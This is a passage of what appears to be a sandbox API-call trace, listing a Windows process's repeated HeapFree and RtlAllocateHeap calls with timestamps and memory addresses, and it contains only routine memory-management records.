lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.534] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.534] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.534] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.534] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.534] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.534] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.534] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.534] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.534] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.534] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.534] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.534] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.534] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.535] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.535] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.535] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.535] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.535] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.535] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.535] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc79138 | out: hHeap=0xc50000) returned 1 [0031.535] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc79250 | out: hHeap=0xc50000) returned 1 [0031.535] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc78f08 | out: hHeap=0xc50000) returned 1 [0031.535] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc78cd8 | out: hHeap=0xc50000) returned 1 [0031.535] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc73ae0 | out: hHeap=0xc50000) returned 1 [0031.535] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0031.535] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71b70 | out: hHeap=0xc50000) returned 1 [0031.535] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75b18 | out: hHeap=0xc50000) returned 1 [0031.535] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.535] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753e8 | out: hHeap=0xc50000) returned 1 [0031.535] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc73c48 | out: hHeap=0xc50000) returned 1 [0031.535] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76028 | out: hHeap=0xc50000) returned 1 [0031.535] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.535] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.535] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.535] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.535] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.535] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.535] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.535] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.535] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.535] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.535] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.535] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.535] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.535] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.535] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.535] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.535] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.535] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.536] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.536] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.536] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.536] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.536] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.536] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.536] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.536] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.536] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.536] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.536] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.536] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.536] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.536] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.536] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.536] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.536] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.536] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.536] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.536] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.536] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.536] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.536] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.536] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.536] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.536] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.536] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.536] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.536] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.536] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.536] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc79368 | out: hHeap=0xc50000) returned 1 [0031.536] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc79020 | out: hHeap=0xc50000) returned 1 [0031.536] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc78f08 | out: hHeap=0xc50000) returned 1 [0031.536] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc797c8 | out: hHeap=0xc50000) returned 1 [0031.536] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc73a80 | out: hHeap=0xc50000) returned 1 [0031.536] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71bf8 | out: hHeap=0xc50000) returned 1 [0031.536] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc716a8 | out: hHeap=0xc50000) returned 1 [0031.537] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc56ed0 | out: hHeap=0xc50000) returned 1 [0031.537] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75a88 | out: hHeap=0xc50000) returned 1 [0031.537] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc78bc0 | out: hHeap=0xc50000) returned 1 [0031.537] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71378 | out: hHeap=0xc50000) returned 1 [0031.537] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.537] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71bf8 | out: hHeap=0xc50000) returned 1 [0031.775] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc76028 [0031.775] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc761d8 [0031.775] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc75de8 [0031.776] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc76268 [0031.776] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc762f8 [0031.776] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc76418 [0031.776] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc760b8 [0031.776] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc75e78 [0031.776] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc757b8 [0031.776] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc75b18 [0031.776] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc76538 [0031.776] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc75f08 [0031.776] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc75a88 [0031.776] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc75968 [0031.776] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc759f8 [0031.776] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc75f98 [0031.776] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc76148 [0031.776] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc75728 [0031.776] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc76388 [0031.776] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc764a8 [0031.776] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc75848 [0031.776] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc765c8 [0031.776] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc75698 [0031.776] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc75c38 [0031.776] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc75cc8 [0031.776] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc77af8 [0031.776] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc77168 [0031.776] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc77558 [0031.776] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc76e98 [0031.776] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc76f28 [0031.776] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc76bc8 [0031.791] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71620 [0031.791] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71620 | out: hHeap=0xc50000) returned 1 [0031.791] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71bf8 [0031.791] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71bf8 | out: hHeap=0xc50000) returned 1 [0031.791] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71e18 [0031.791] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71e18 | out: hHeap=0xc50000) returned 1 [0031.791] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71e18 [0031.791] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71e18 | out: hHeap=0xc50000) returned 1 [0031.791] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc72038 [0031.791] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72038 | out: hHeap=0xc50000) returned 1 [0031.791] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71c80 [0031.791] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71c80 | out: hHeap=0xc50000) returned 1 [0031.791] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71d08 [0031.791] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71d08 | out: hHeap=0xc50000) returned 1 [0031.791] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc718c8 [0031.791] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc718c8 | out: hHeap=0xc50000) returned 1 [0031.791] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71d08 [0031.791] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71d08 | out: hHeap=0xc50000) returned 1 [0031.791] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71a60 [0031.792] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71a60 | out: hHeap=0xc50000) returned 1 [0031.792] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc721d0 [0031.792] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc721d0 | out: hHeap=0xc50000) returned 1 [0031.792] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71b70 [0031.792] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71b70 | out: hHeap=0xc50000) returned 1 [0031.792] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71510 [0031.792] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71510 | out: hHeap=0xc50000) returned 1 [0031.792] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc716a8 [0031.792] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc716a8 | out: hHeap=0xc50000) returned 1 [0031.792] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71b70 [0031.792] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71b70 | out: hHeap=0xc50000) returned 1 [0031.792] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc717b8 [0031.792] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc717b8 | out: hHeap=0xc50000) returned 1 [0031.792] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71620 [0031.792] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71620 | out: hHeap=0xc50000) returned 1 [0031.792] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71620 [0031.792] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71620 | out: hHeap=0xc50000) returned 1 [0031.792] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71488 [0031.792] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71488 | out: hHeap=0xc50000) returned 1 [0031.792] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71510 [0031.792] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71510 | out: hHeap=0xc50000) returned 1 [0031.792] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc718c8 [0031.792] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc718c8 | out: hHeap=0xc50000) returned 1 [0031.792] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71e18 [0031.792] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71e18 | out: hHeap=0xc50000) returned 1 [0031.792] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71a60 [0031.792] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71a60 | out: hHeap=0xc50000) returned 1 [0031.792] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc721d0 [0031.792] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc721d0 | out: hHeap=0xc50000) returned 1 [0031.792] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc721d0 [0031.792] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc721d0 | out: hHeap=0xc50000) returned 1 [0031.792] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc718c8 [0031.792] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc718c8 | out: hHeap=0xc50000) returned 1 [0031.792] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc72038 [0031.792] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72038 | out: hHeap=0xc50000) returned 1 [0031.792] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71e18 [0031.792] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71e18 | out: hHeap=0xc50000) returned 1 [0031.792] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc717b8 [0031.792] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc717b8 | out: hHeap=0xc50000) returned 1 [0031.792] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71c80 [0031.792] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71c80 | out: hHeap=0xc50000) returned 1 [0031.792] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc717b8 [0031.792] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc717b8 | out: hHeap=0xc50000) returned 1 [0031.792] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc72038 [0031.792] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72038 | out: hHeap=0xc50000) returned 1 [0031.792] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc72038 [0031.793] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72038 | out: hHeap=0xc50000) returned 1 [0031.793] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc72038 [0031.793] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72038 | out: hHeap=0xc50000) returned 1 [0031.793] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc716a8 [0031.793] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc716a8 | out: hHeap=0xc50000) returned 1 [0031.793] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71510 [0031.793] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71510 | out: hHeap=0xc50000) returned 1 [0031.793] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc72038 [0031.793] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72038 | out: hHeap=0xc50000) returned 1 [0031.793] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71c80 [0031.793] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71c80 | out: hHeap=0xc50000) returned 1 [0031.793] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc717b8 [0031.793] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc717b8 | out: hHeap=0xc50000) returned 1 [0031.793] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc716a8 [0031.793] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc716a8 | out: hHeap=0xc50000) returned 1 [0031.793] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71bf8 [0031.793] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71bf8 | out: hHeap=0xc50000) returned 1 [0031.793] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71378 [0031.793] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71378 | out: hHeap=0xc50000) returned 1 [0031.793] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc72038 [0031.793] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72038 | out: hHeap=0xc50000) returned 1 [0031.793] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71400 [0031.793] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71400 | out: hHeap=0xc50000) returned 1 [0031.793] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71620 [0031.793] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71620 | out: hHeap=0xc50000) returned 1 [0031.793] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc721d0 [0031.793] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc721d0 | out: hHeap=0xc50000) returned 1 [0031.793] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71e18 [0031.793] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71e18 | out: hHeap=0xc50000) returned 1 [0031.793] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71950 [0031.793] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71950 | out: hHeap=0xc50000) returned 1 [0031.793] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71e18 [0031.793] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71e18 | out: hHeap=0xc50000) returned 1 [0031.793] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71d08 [0031.793] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71d08 | out: hHeap=0xc50000) returned 1 [0031.793] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc721d0 [0031.793] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc721d0 | out: hHeap=0xc50000) returned 1 [0031.793] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71620 [0031.793] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71620 | out: hHeap=0xc50000) returned 1 [0031.793] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc72038 [0031.793] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72038 | out: hHeap=0xc50000) returned 1 [0031.793] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71d90 [0031.793] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71d90 | out: hHeap=0xc50000) returned 1 [0031.793] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71a60 [0031.793] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71a60 | out: hHeap=0xc50000) returned 1 [0031.793] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71a60 [0031.794] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71a60 | out: hHeap=0xc50000) returned 1 [0031.794] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc721d0 [0031.794] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc721d0 | out: hHeap=0xc50000) returned 1 [0031.794] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc721d0 [0031.794] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc721d0 | out: hHeap=0xc50000) returned 1 [0031.794] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc72038 [0031.794] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72038 | out: hHeap=0xc50000) returned 1 [0031.794] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71950 [0031.794] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71950 